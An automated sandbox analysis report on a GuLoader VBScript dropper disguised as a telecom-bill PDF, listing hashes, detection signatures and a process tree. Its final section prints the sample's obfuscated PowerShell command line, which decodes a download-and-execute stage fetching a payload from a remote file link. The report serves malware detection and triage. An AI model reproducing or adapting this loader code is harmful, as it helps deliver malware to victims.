Edit tour
Windows
Analysis Report
11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
Overview
General Information
Sample name: | 11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | 11309-pdf.vbs |
Analysis ID: | 1522523 |
MD5: | cd9505a0c492be1e52f012f624835147 |
SHA1: | bece8abdda5efe16102c4c04d66cb1ab644b0046 |
SHA256: | 9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0 |
Tags: | vbsuser-abuse_ch |
Infos: | |
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 180 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\11309 -#U96fb#U4 fe1#U8cbb# U96fb#U5b5 0#U901a#U7 7e5#U55ae# U00b7pdf.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7432 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Ramphas tidae Mise mphasizati on Truncal Overvaere Blokdiagr am #>;$Pyr oheliomete r='Fllessp isninger'; <#Reform P alegold Sl ukningsmat erialerne Udrede Bru gsklare Ma jos Coveys #>;$Grubb ers=$host. PrivateDat a;If ($Gru bbers) {$m ussack++;} function S house($Rel ativity209 ){$Unsinga bility=$Fe rtilizatio ns+$Relati vity209.Le ngth-$muss ack;for( $ Iceboats=5 ;$Iceboats -lt $Unsi ngability; $Iceboats+ =6){$Forst aaelsespro ces+=$Rela tivity209[ $Iceboats] ;}$Forstaa elsesproce s;}functio n Lnder($S tabl){ . ($Blyantst ifter) ($S tabl);}$Ny hedens=Sho use 'Confe MSkrivoAgg az likfi. heyalTekst lBjlkeaZeu go/Pr he5p lit.Kamer 0 ndkr Pre l,(FamilW pse iNedf nTipofdCs reoFullywC ardosU.gra OvatNA.hi lTaudio Fr ihe1Kirke0 Bel,a.Inte r0Sho,t;sa m,r AdrenW Tr baiAphe tnMulig6,u ltr4Reser; Films Mani fxGnidn6Pr o y4Se ic; Recom Musi krelgtyvCr edu:Jor.a1 Hopl2Amid o1Under.Wi lde0H,pop) Ko,ma Wife GUstyreEnt racFlydek dopyoBacks /Misfo2 Fo re0Monos1 V go0Rorpi 0 pis1Epi i0Vrdi,1re sig AcraFL aconiDukke rUgen,e Vi llfTad ooH almlxItc l /Hexac1 rd e2trans1Af las. Omg,0 Sca p ';$D dsfjende=S house ',og geusm apsE ntheeOptim R ran-Udbi nAJord g F ishEWakasn .asuntUpgl i ';$Ornat erne=Shous e 'BinrvhF od,atMsink tkla,dppso visP yll:K oord/ ult/ Fo,sd Dis prAs riiSc apevSundhe Kims.Acoe mgContioRe soloThr,ug Bi delreno reAsers.Ty phlcShivao Poin,m Try k/AniliuSp rogc C.ba? photoeDemo lxF ugtpre oloDrukkr Stormt,ina n=Ye lodKn ub oFnaddw salnanDati vl atioo B esiaacisdd Koll&Ekso ri nonddMo no =Mobil1 Per ozLaan ej marei e forU Bl,dY CasuiIBesn oFBindeREl freKSvi.eW atrET nds mpredeA Sh i,YSpeak5T ermo8Katar vBa lopSpi ld5Indv hN ab bWV ils 7 pancQTes tu3UntemT CleaQIn ur zEmaljH el eASusp F V arma SemiW Spint ';$c itronsomme rfuglens=S house 'pol it>H rry ' ;$Blyantst ifter=Shou se ' Eosii LaendESora lX.emig '; $Qe='bokse t';$Iceboa tsnformati onskanaler ne='\Maske s.lea';Lnd er (Shouse ',ycon$ n lucgOptagl FejlroCoad mbPat iaPr osplInnar: Tra,iUmien bnPneumsin .erediabea RelatsU.ag lo Thern a ,rya g,nbb I dsplVana feN vem= A dvo$Var oe WhinsnOrto pvInko :sk smaPrea p S andpD sk rd V.isaSt ivstC anga aagn+Afs u$ Enc.Ih, uchcEilaie AllodbKult uo Ti.faAc leit ambss Atl nnKuwa ifSuperoRa ngsrPapism Stifa And tAk iviCh omoJagthn Ansk,sEpik lkRapteaRu batnFerlea Udkanl Ide ee Nitrrbr utanUnclie Bo,ep ');L nder (Shou se ' Spre$ T rtigR da klFrifio H jerb P ria Unim lFlin g:NytnkPko ntor O.eno F ededre r aunontakri gsbtStegei nchaoObli gnMyrmesEs piesrubefy UdlovsPur otTropeeFi ngimU ati= Some$ Opm aO PalmrAu tomn Forba PuzzltF rs keInh mr . echnNon he Cytop.N.op ls sladp F ltl logmi